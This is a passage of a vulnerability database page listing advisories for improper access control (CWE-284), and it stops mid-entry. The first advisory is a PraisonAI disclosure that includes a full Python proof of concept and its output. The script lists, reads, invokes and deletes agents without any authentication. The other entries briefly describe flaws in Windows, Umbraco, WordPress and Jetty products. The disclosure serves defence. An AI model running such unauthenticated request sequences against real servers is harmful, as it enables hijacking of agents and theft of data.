CWE-284
DiscouragedImproper Access Control
Abstraction: Pillar · Status: Incomplete
The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
7803 vulnerabilities reference this CWE, most recent first.
GHSA-86QC-R5V2-V6X6
Vulnerability from github – Published: 2026-05-29 22:27 – Updated: 2026-05-29 22:27Summary
PraisonAI's call server exposes a network-facing agent control API without authentication when CALL_SERVER_TOKEN is not configured.
The affected component is the praisonai.api.agent_invoke router as mounted by praisonai.api.call. The authentication helper verify_token() fails open when CALL_SERVER_TOKEN is unset. Since every sensitive agent-control endpoint depends on this helper, starting the call server without a token allows any reachable client to list agents, inspect agent metadata and instructions, invoke agents, and unregister agents.
This is security-relevant because the bundled call server includes the vulnerable router and binds to 0.0.0.0. As a result, operators who launch the call server without explicitly setting CALL_SERVER_TOKEN may unintentionally expose an unauthenticated remote agent control plane.
Details
The vulnerable behavior is caused by a fail-open authentication default.
In praisonai/api/agent_invoke.py, CALL_SERVER_TOKEN is read from the environment:
CALL_SERVER_TOKEN = os.getenv('CALL_SERVER_TOKEN')
The authentication dependency then returns successfully when the token is not configured:
async def verify_token(request: Request, authorization: Optional[str] = Header(None)) -> None:
if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN:
return # No authentication if FastAPI unavailable or no token set
This means that the absence of CALL_SERVER_TOKEN disables authentication entirely.
The same helper is used by sensitive agent-control routes, including:
@router.post("/agents/{agent_id}/invoke")
async def invoke_agent(..., _: None = Depends(verify_token))
@router.get("/agents")
async def list_agents(_: None = Depends(verify_token))
@router.delete("/agents/{agent_id}")
async def unregister_agent_endpoint(agent_id: str, _: None = Depends(verify_token))
@router.get("/agents/{agent_id}")
async def get_agent_info(agent_id: str, _: None = Depends(verify_token))
These endpoints allow a caller to:
- list registered agents;
- retrieve agent metadata;
- retrieve agent instruction text;
- invoke agents;
- unregister agents.
The vulnerable router is mounted by the call server:
from .agent_invoke import router as agent_invoke_router
app.include_router(agent_invoke_router)
The call server then listens on all interfaces:
uvicorn.run(app, host="0.0.0.0", port=port, log_level="warning")
Therefore, when praisonai-call is started without CALL_SERVER_TOKEN, the agent-control API becomes reachable without authentication from any client that can access the server.
PoC
The following local PoC imports the real praisonai.api.agent_invoke router from source, ensures CALL_SERVER_TOKEN is absent, registers a demo agent, mounts the router into a local FastAPI app, and sends unauthenticated requests to the vulnerable endpoints.
The PoC proves that, without sending any authentication material:
GET /api/v1/agentsreturns the list of registered agents.GET /api/v1/agents/{agent_id}exposes agent metadata and instructions.POST /api/v1/agents/{agent_id}/invokeexecutes the registered agent.DELETE /api/v1/agents/{agent_id}unregisters the agent.
Run with:
PRAISONAI_REPO=/path/to/PraisonAI python -B embedded_poc.py
Full PoC:
#!/usr/bin/env python3
from __future__ import annotations
import os
import sys
from pathlib import Path
from types import SimpleNamespace
REPO_ROOT = Path(os.environ.get("PRAISONAI_REPO", "/path/to/PraisonAI")).resolve()
PRAISON_ROOT = REPO_ROOT / "src" / "praisonai"
def verify_source() -> None:
expected = {
PRAISON_ROOT / "praisonai/api/agent_invoke.py": [
"CALL_SERVER_TOKEN = os.getenv('CALL_SERVER_TOKEN')",
"if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN:",
'@router.post("/agents/{agent_id}/invoke")',
'@router.get("/agents")',
'@router.delete("/agents/{agent_id}")',
'@router.get("/agents/{agent_id}")',
],
PRAISON_ROOT / "praisonai/api/call.py": [
"app.include_router(agent_invoke_router)",
'uvicorn.run(app, host="0.0.0.0", port=port, log_level="warning")',
],
}
for path, needles in expected.items():
if not path.exists():
raise RuntimeError(f"source verification failed: file not found: {path}")
text = path.read_text(encoding="utf-8")
for needle in needles:
if needle not in text:
raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")
class DemoAgent:
name = "demo-agent"
instructions = "super-secret instructions"
tools = [SimpleNamespace(name="danger-tool")]
def start(self, message: str) -> str:
return f"echo:{message}"
def main() -> int:
verify_source()
os.environ.pop("CALL_SERVER_TOKEN", None)
sys.path.insert(0, str(PRAISON_ROOT))
from fastapi import FastAPI
from fastapi.testclient import TestClient
from praisonai.api.agent_invoke import CALL_SERVER_TOKEN, register_agent, router
app = FastAPI()
app.include_router(router)
register_agent("demo", DemoAgent())
client = TestClient(app)
list_resp = client.get("/api/v1/agents")
info_resp = client.get("/api/v1/agents/demo")
invoke_resp = client.post("/api/v1/agents/demo/invoke", json={"message": "hello"})
delete_resp = client.delete("/api/v1/agents/demo")
print(f"[poc] token_configured={bool(CALL_SERVER_TOKEN)}")
print(f"[poc] list_status={list_resp.status_code} body={list_resp.json()}")
print(f"[poc] info_status={info_resp.status_code} body={info_resp.json()}")
print(f"[poc] invoke_status={invoke_resp.status_code} body={invoke_resp.json()}")
print(f"[poc] delete_status={delete_resp.status_code} body={delete_resp.json()}")
if CALL_SERVER_TOKEN:
raise SystemExit("[poc] MISS: CALL_SERVER_TOKEN unexpectedly set in test process")
if list_resp.status_code != 200 or "demo" not in list_resp.json().get("agents", []):
raise SystemExit("[poc] MISS: unauthenticated agent listing failed")
if info_resp.status_code != 200 or info_resp.json().get("instructions") != "super-secret instructions":
raise SystemExit("[poc] MISS: unauthenticated agent info leak failed")
if invoke_resp.status_code != 200 or invoke_resp.json().get("result") != "echo:hello":
raise SystemExit("[poc] MISS: unauthenticated agent invocation failed")
if delete_resp.status_code != 200:
raise SystemExit("[poc] MISS: unauthenticated agent unregister failed")
print("[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Observed result:
[poc] token_configured=False
[poc] list_status=200 body={'agents': ['demo'], 'count': 1, 'status': 'success'}
[poc] info_status=200 body={'agent_id': 'demo', 'status': 'registered', 'type': 'DemoAgent', 'name': 'demo-agent', 'instructions': 'super-secret instructions', 'tools': ['danger-tool']}
[poc] invoke_status=200 body={'result': 'echo:hello', 'session_id': 'default', 'status': 'success', 'metadata': {'agent_id': 'demo', 'message_length': 5, 'response_length': 10}}
[poc] delete_status=200 body={'message': "Agent 'demo' unregistered successfully", 'status': 'success'}
[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent
This confirms that the agent-control endpoints are accessible without authentication when CALL_SERVER_TOKEN is unset.
Impact
If an operator runs the PraisonAI call server without explicitly setting CALL_SERVER_TOKEN, any reachable client may be able to:
- enumerate registered agents;
- read agent metadata;
- read agent instruction text;
- invoke agents;
- trigger downstream tools or external integrations connected to agents;
- consume model or API budget through repeated invocation;
- unregister agents and disrupt availability.
The impact depends on the deployed agents and their connected tools. For agents wired to external APIs, internal systems, local tools, or privileged actions, this creates a remote unauthenticated control surface.
The issue is not limited to information disclosure. The unauthenticated invoke endpoint can trigger agent execution, and the unauthenticated delete endpoint can remove registered agents.
Suggested remediation
Recommended fixes:
- Fail closed when
CALL_SERVER_TOKENis unset.
The authentication dependency should reject requests unless authentication is explicitly configured and a valid token is supplied.
-
Refuse to mount the agent invocation router unless authentication is configured.
-
If unauthenticated mode is intended for local development, bind to
127.0.0.1by default whenCALL_SERVER_TOKENis absent. -
Add a startup error or highly visible warning when the call server is started without authentication.
-
Add regression tests that assert
401 Unauthorizedfor all sensitive agent routes when no valid token is supplied. -
Consider requiring an explicit unsafe flag, such as
--allow-unauthenticated-call-server, before allowing the server to start without authentication.
Security boundary
This report concerns the default authentication behavior of a network-facing server component. The issue is not that users can intentionally disable authentication for trusted local development. The issue is that the server fails open when CALL_SERVER_TOKEN is missing while the bundled server binds to 0.0.0.0, which can expose the agent-control API remotely.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.39"
},
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.40"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47396"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T22:27:34Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\n\nPraisonAI\u0027s call server exposes a network-facing agent control API without authentication when `CALL_SERVER_TOKEN` is not configured.\n\nThe affected component is the `praisonai.api.agent_invoke` router as mounted by `praisonai.api.call`. The authentication helper `verify_token()` fails open when `CALL_SERVER_TOKEN` is unset. Since every sensitive agent-control endpoint depends on this helper, starting the call server without a token allows any reachable client to list agents, inspect agent metadata and instructions, invoke agents, and unregister agents.\n\nThis is security-relevant because the bundled call server includes the vulnerable router and binds to `0.0.0.0`. As a result, operators who launch the call server without explicitly setting `CALL_SERVER_TOKEN` may unintentionally expose an unauthenticated remote agent control plane.\n\n### Details\n\nThe vulnerable behavior is caused by a fail-open authentication default.\n\nIn `praisonai/api/agent_invoke.py`, `CALL_SERVER_TOKEN` is read from the environment:\n\n```python\nCALL_SERVER_TOKEN = os.getenv(\u0027CALL_SERVER_TOKEN\u0027)\n```\n\nThe authentication dependency then returns successfully when the token is not configured:\n\n```python\nasync def verify_token(request: Request, authorization: Optional[str] = Header(None)) -\u003e None:\n if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN:\n return # No authentication if FastAPI unavailable or no token set\n```\n\nThis means that the absence of `CALL_SERVER_TOKEN` disables authentication entirely.\n\nThe same helper is used by sensitive agent-control routes, including:\n\n```python\n@router.post(\"/agents/{agent_id}/invoke\")\nasync def invoke_agent(..., _: None = Depends(verify_token))\n\n@router.get(\"/agents\")\nasync def list_agents(_: None = Depends(verify_token))\n\n@router.delete(\"/agents/{agent_id}\")\nasync def unregister_agent_endpoint(agent_id: str, _: None = Depends(verify_token))\n\n@router.get(\"/agents/{agent_id}\")\nasync def get_agent_info(agent_id: str, _: None = Depends(verify_token))\n```\n\nThese endpoints allow a caller to:\n\n- list registered agents;\n- retrieve agent metadata;\n- retrieve agent instruction text;\n- invoke agents;\n- unregister agents.\n\nThe vulnerable router is mounted by the call server:\n\n```python\nfrom .agent_invoke import router as agent_invoke_router\napp.include_router(agent_invoke_router)\n```\n\nThe call server then listens on all interfaces:\n\n```python\nuvicorn.run(app, host=\"0.0.0.0\", port=port, log_level=\"warning\")\n```\n\nTherefore, when `praisonai-call` is started without `CALL_SERVER_TOKEN`, the agent-control API becomes reachable without authentication from any client that can access the server.\n\n### PoC\n\nThe following local PoC imports the real `praisonai.api.agent_invoke` router from source, ensures `CALL_SERVER_TOKEN` is absent, registers a demo agent, mounts the router into a local FastAPI app, and sends unauthenticated requests to the vulnerable endpoints.\n\nThe PoC proves that, without sending any authentication material:\n\n1. `GET /api/v1/agents` returns the list of registered agents.\n2. `GET /api/v1/agents/{agent_id}` exposes agent metadata and instructions.\n3. `POST /api/v1/agents/{agent_id}/invoke` executes the registered agent.\n4. `DELETE /api/v1/agents/{agent_id}` unregisters the agent.\n\nRun with:\n\n```bash\nPRAISONAI_REPO=/path/to/PraisonAI python -B embedded_poc.py\n```\n\nFull PoC:\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport os\nimport sys\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\n\nREPO_ROOT = Path(os.environ.get(\"PRAISONAI_REPO\", \"/path/to/PraisonAI\")).resolve()\nPRAISON_ROOT = REPO_ROOT / \"src\" / \"praisonai\"\n\n\ndef verify_source() -\u003e None:\n expected = {\n PRAISON_ROOT / \"praisonai/api/agent_invoke.py\": [\n \"CALL_SERVER_TOKEN = os.getenv(\u0027CALL_SERVER_TOKEN\u0027)\",\n \"if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN:\",\n \u0027@router.post(\"/agents/{agent_id}/invoke\")\u0027,\n \u0027@router.get(\"/agents\")\u0027,\n \u0027@router.delete(\"/agents/{agent_id}\")\u0027,\n \u0027@router.get(\"/agents/{agent_id}\")\u0027,\n ],\n PRAISON_ROOT / \"praisonai/api/call.py\": [\n \"app.include_router(agent_invoke_router)\",\n \u0027uvicorn.run(app, host=\"0.0.0.0\", port=port, log_level=\"warning\")\u0027,\n ],\n }\n\n for path, needles in expected.items():\n if not path.exists():\n raise RuntimeError(f\"source verification failed: file not found: {path}\")\n\n text = path.read_text(encoding=\"utf-8\")\n for needle in needles:\n if needle not in text:\n raise RuntimeError(f\"source verification failed: {needle!r} not found in {path}\")\n\n\nclass DemoAgent:\n name = \"demo-agent\"\n instructions = \"super-secret instructions\"\n tools = [SimpleNamespace(name=\"danger-tool\")]\n\n def start(self, message: str) -\u003e str:\n return f\"echo:{message}\"\n\n\ndef main() -\u003e int:\n verify_source()\n\n os.environ.pop(\"CALL_SERVER_TOKEN\", None)\n sys.path.insert(0, str(PRAISON_ROOT))\n\n from fastapi import FastAPI\n from fastapi.testclient import TestClient\n from praisonai.api.agent_invoke import CALL_SERVER_TOKEN, register_agent, router\n\n app = FastAPI()\n app.include_router(router)\n\n register_agent(\"demo\", DemoAgent())\n\n client = TestClient(app)\n\n list_resp = client.get(\"/api/v1/agents\")\n info_resp = client.get(\"/api/v1/agents/demo\")\n invoke_resp = client.post(\"/api/v1/agents/demo/invoke\", json={\"message\": \"hello\"})\n delete_resp = client.delete(\"/api/v1/agents/demo\")\n\n print(f\"[poc] token_configured={bool(CALL_SERVER_TOKEN)}\")\n print(f\"[poc] list_status={list_resp.status_code} body={list_resp.json()}\")\n print(f\"[poc] info_status={info_resp.status_code} body={info_resp.json()}\")\n print(f\"[poc] invoke_status={invoke_resp.status_code} body={invoke_resp.json()}\")\n print(f\"[poc] delete_status={delete_resp.status_code} body={delete_resp.json()}\")\n\n if CALL_SERVER_TOKEN:\n raise SystemExit(\"[poc] MISS: CALL_SERVER_TOKEN unexpectedly set in test process\")\n\n if list_resp.status_code != 200 or \"demo\" not in list_resp.json().get(\"agents\", []):\n raise SystemExit(\"[poc] MISS: unauthenticated agent listing failed\")\n\n if info_resp.status_code != 200 or info_resp.json().get(\"instructions\") != \"super-secret instructions\":\n raise SystemExit(\"[poc] MISS: unauthenticated agent info leak failed\")\n\n if invoke_resp.status_code != 200 or invoke_resp.json().get(\"result\") != \"echo:hello\":\n raise SystemExit(\"[poc] MISS: unauthenticated agent invocation failed\")\n\n if delete_resp.status_code != 200:\n raise SystemExit(\"[poc] MISS: unauthenticated agent unregister failed\")\n\n print(\"[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent\")\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n\nObserved result:\n\n```text\n[poc] token_configured=False\n[poc] list_status=200 body={\u0027agents\u0027: [\u0027demo\u0027], \u0027count\u0027: 1, \u0027status\u0027: \u0027success\u0027}\n[poc] info_status=200 body={\u0027agent_id\u0027: \u0027demo\u0027, \u0027status\u0027: \u0027registered\u0027, \u0027type\u0027: \u0027DemoAgent\u0027, \u0027name\u0027: \u0027demo-agent\u0027, \u0027instructions\u0027: \u0027super-secret instructions\u0027, \u0027tools\u0027: [\u0027danger-tool\u0027]}\n[poc] invoke_status=200 body={\u0027result\u0027: \u0027echo:hello\u0027, \u0027session_id\u0027: \u0027default\u0027, \u0027status\u0027: \u0027success\u0027, \u0027metadata\u0027: {\u0027agent_id\u0027: \u0027demo\u0027, \u0027message_length\u0027: 5, \u0027response_length\u0027: 10}}\n[poc] delete_status=200 body={\u0027message\u0027: \"Agent \u0027demo\u0027 unregistered successfully\", \u0027status\u0027: \u0027success\u0027}\n[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent\n```\n\nThis confirms that the agent-control endpoints are accessible without authentication when `CALL_SERVER_TOKEN` is unset.\n\n### Impact\n\nIf an operator runs the PraisonAI call server without explicitly setting `CALL_SERVER_TOKEN`, any reachable client may be able to:\n\n- enumerate registered agents;\n- read agent metadata;\n- read agent instruction text;\n- invoke agents;\n- trigger downstream tools or external integrations connected to agents;\n- consume model or API budget through repeated invocation;\n- unregister agents and disrupt availability.\n\nThe impact depends on the deployed agents and their connected tools. For agents wired to external APIs, internal systems, local tools, or privileged actions, this creates a remote unauthenticated control surface.\n\nThe issue is not limited to information disclosure. The unauthenticated `invoke` endpoint can trigger agent execution, and the unauthenticated `delete` endpoint can remove registered agents.\n\n### Suggested remediation\n\nRecommended fixes:\n\n1. Fail closed when `CALL_SERVER_TOKEN` is unset.\n\n The authentication dependency should reject requests unless authentication is explicitly configured and a valid token is supplied.\n\n2. Refuse to mount the agent invocation router unless authentication is configured.\n\n3. If unauthenticated mode is intended for local development, bind to `127.0.0.1` by default when `CALL_SERVER_TOKEN` is absent.\n\n4. Add a startup error or highly visible warning when the call server is started without authentication.\n\n5. Add regression tests that assert `401 Unauthorized` for all sensitive agent routes when no valid token is supplied.\n\n6. Consider requiring an explicit unsafe flag, such as `--allow-unauthenticated-call-server`, before allowing the server to start without authentication.\n\n### Security boundary\n\nThis report concerns the default authentication behavior of a network-facing server component. The issue is not that users can intentionally disable authentication for trusted local development. The issue is that the server fails open when `CALL_SERVER_TOKEN` is missing while the bundled server binds to `0.0.0.0`, which can expose the agent-control API remotely.",
"id": "GHSA-86qc-r5v2-v6x6",
"modified": "2026-05-29T22:27:34Z",
"published": "2026-05-29T22:27:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-86qc-r5v2-v6x6"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI call server exposes unauthenticated agent listing, invocation, and deletion when CALL_SERVER_TOKEN is unset"
}
GHSA-86R9-MRQJ-2V4F
Vulnerability from github – Published: 2024-08-08 12:30 – Updated: 2024-08-08 12:30Access control vulnerability in the security verification module mpact: Successful exploitation of this vulnerability will affect integrity and confidentiality.
{
"affected": [],
"aliases": [
"CVE-2024-42033"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-08T10:15:06Z",
"severity": "MODERATE"
},
"details": "Access control vulnerability in the security verification module\nmpact: Successful exploitation of this vulnerability will affect integrity and confidentiality.",
"id": "GHSA-86r9-mrqj-2v4f",
"modified": "2024-08-08T12:30:34Z",
"published": "2024-08-08T12:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42033"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2024/8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-86V4-5HV3-JFF7
Vulnerability from github – Published: 2025-12-11 18:30 – Updated: 2025-12-11 18:30Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges locally.
{
"affected": [],
"aliases": [
"CVE-2025-64669"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-11T18:16:24Z",
"severity": "HIGH"
},
"details": "Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges locally.",
"id": "GHSA-86v4-5hv3-jff7",
"modified": "2025-12-11T18:30:46Z",
"published": "2025-12-11T18:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64669"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64669"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-86VQ-CCWF-RM62
Vulnerability from github – Published: 2026-02-27 18:35 – Updated: 2026-03-19 16:13Description
A vulnerability has been identified in Umbraco Engage where certain API endpoints are exposed without enforcing authentication or authorization checks. The affected endpoints can be accessed directly over the network without requiring a valid session or user credentials. By supplying a user-controlled identifier parameter (e.g., ?id=), an attacker can retrieve sensitive data associated with arbitrary records.
Because no access control validation is performed, the endpoints are vulnerable to enumeration attacks, allowing attackers to iterate over identifiers and extract data at scale.
Impact
An unauthenticated attacker can retrieve sensitive Engage-related data by directly querying the affected API endpoints. The vulnerability allows arbitrary record access through predictable or enumerable identifiers.
The confidentiality impact is considered high. No direct integrity or availability impact has been identified.
The scope of exposed data depends on the deployment but may include analytics data, tracking data, customer-related information, or other Engage-managed content.
Patches
The vulnerability affects both v16 and v17. Patches have already been released. Users are advised to update to 16.2.1 or 17.1.1
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
References
Are there any links users can visit to find out more?
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Umbraco.Engage.Forms"
},
"ranges": [
{
"events": [
{
"introduced": "16.0.0"
},
{
"fixed": "16.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Umbraco.Engage.Forms"
},
"ranges": [
{
"events": [
{
"introduced": "17.0.0"
},
{
"fixed": "17.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27449"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-306",
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-27T18:35:57Z",
"nvd_published_at": "2026-02-26T22:20:47Z",
"severity": "HIGH"
},
"details": "### Description\nA vulnerability has been identified in Umbraco Engage where certain API endpoints are exposed without enforcing authentication or authorization checks. The affected endpoints can be accessed directly over the network without requiring a valid session or user credentials. By supplying a user-controlled identifier parameter (e.g., ?id=), an attacker can retrieve sensitive data associated with arbitrary records.\n\nBecause no access control validation is performed, the endpoints are vulnerable to enumeration attacks, allowing attackers to iterate over identifiers and extract data at scale.\n\n### Impact\nAn unauthenticated attacker can retrieve sensitive Engage-related data by directly querying the affected API endpoints. The vulnerability allows arbitrary record access through predictable or enumerable identifiers.\n\nThe confidentiality impact is considered high. No direct integrity or availability impact has been identified.\n\nThe scope of exposed data depends on the deployment but may include analytics data, tracking data, customer-related information, or other Engage-managed content.\n\n### Patches\nThe vulnerability affects both v16 and v17. Patches have already been released. Users are advised to update to 16.2.1 or 17.1.1\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n_Are there any links users can visit to find out more?_",
"id": "GHSA-86vq-ccwf-rm62",
"modified": "2026-03-19T16:13:28Z",
"published": "2026-02-27T18:35:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/umbraco/Umbraco.Engage.Issues/security/advisories/GHSA-86vq-ccwf-rm62"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27449"
},
{
"type": "PACKAGE",
"url": "https://github.com/umbraco/Umbraco.Engage.Issues"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Umbraco.Engage.Forms Allows Unauthorized Access to Multiple API Endpoints"
}
GHSA-86WX-CQQ7-836P
Vulnerability from github – Published: 2025-08-26 06:31 – Updated: 2025-08-26 06:31A vulnerability has been found in SourceCodester Human Resource Information System 1.0. Affected by this issue is some unknown functionality of the file /Superadmin_Dashboard/process/editemployee_process.php. Such manipulation of the argument employee_file201 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
{
"affected": [],
"aliases": [
"CVE-2025-9476"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-26T06:15:33Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been found in SourceCodester Human Resource Information System 1.0. Affected by this issue is some unknown functionality of the file /Superadmin_Dashboard/process/editemployee_process.php. Such manipulation of the argument employee_file201 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-86wx-cqq7-836p",
"modified": "2025-08-26T06:31:01Z",
"published": "2025-08-26T06:31:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9476"
},
{
"type": "WEB",
"url": "https://github.com/lrjbsyh/CVE_Hunter/issues/5"
},
{
"type": "WEB",
"url": "https://github.com/lrjbsyh/CVE_Hunter/issues/5#issue-3322736605"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.321345"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.321345"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.634757"
},
{
"type": "WEB",
"url": "https://www.sourcecodester.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-8727-CVXH-WG93
Vulnerability from github – Published: 2024-04-09 21:31 – Updated: 2026-04-08 18:32The s2Member – Best Membership Plugin for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 230815 via the API. This makes it possible for unauthenticated attackers to see the contents of those posts and pages.
{
"affected": [],
"aliases": [
"CVE-2024-0899"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T19:15:15Z",
"severity": "MODERATE"
},
"details": "The s2Member \u2013 Best Membership Plugin for All Kinds of Memberships, Content Restriction Paywalls \u0026 Member Access Subscriptions plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 230815 via the API. This makes it possible for unauthenticated attackers to see the contents of those posts and pages.",
"id": "GHSA-8727-cvxh-wg93",
"modified": "2026-04-08T18:32:53Z",
"published": "2024-04-09T21:31:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0899"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3051411%40s2member%2Ftrunk\u0026old=3037346%40s2member%2Ftrunk\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/80bfb470-a3df-497f-940d-051ccaa6215b?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-872C-CMQ4-P7WQ
Vulnerability from github – Published: 2025-06-10 18:32 – Updated: 2025-06-10 18:32Improper access control in Windows SDK allows an authorized attacker to elevate privileges locally.
{
"affected": [],
"aliases": [
"CVE-2025-47962"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-10T17:24:10Z",
"severity": "HIGH"
},
"details": "Improper access control in Windows SDK allows an authorized attacker to elevate privileges locally.",
"id": "GHSA-872c-cmq4-p7wq",
"modified": "2025-06-10T18:32:31Z",
"published": "2025-06-10T18:32:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47962"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47962"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-872G-2H8H-362Q
Vulnerability from github – Published: 2018-10-19 16:16 – Updated: 2022-09-14 01:07The path normalization mechanism in PathResource class in Eclipse Jetty 9.3.x before 9.3.9 on Windows allows remote attackers to bypass protected resource restrictions and other security constraints via a URL with certain escaped characters, related to backslashes.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.3.0"
},
{
"fixed": "9.3.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-4800"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:24:37Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "The path normalization mechanism in PathResource class in Eclipse Jetty 9.3.x before 9.3.9 on Windows allows remote attackers to bypass protected resource restrictions and other security constraints via a URL with certain escaped characters, related to backslashes.",
"id": "GHSA-872g-2h8h-362q",
"modified": "2022-09-14T01:07:09Z",
"published": "2018-10-19T16:16:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4800"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-872g-2h8h-362q"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20190307-0006"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"type": "WEB",
"url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00092.html"
},
{
"type": "WEB",
"url": "http://www.ocert.org/advisories/ocert-2016-001.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/90945"
},
{
"type": "WEB",
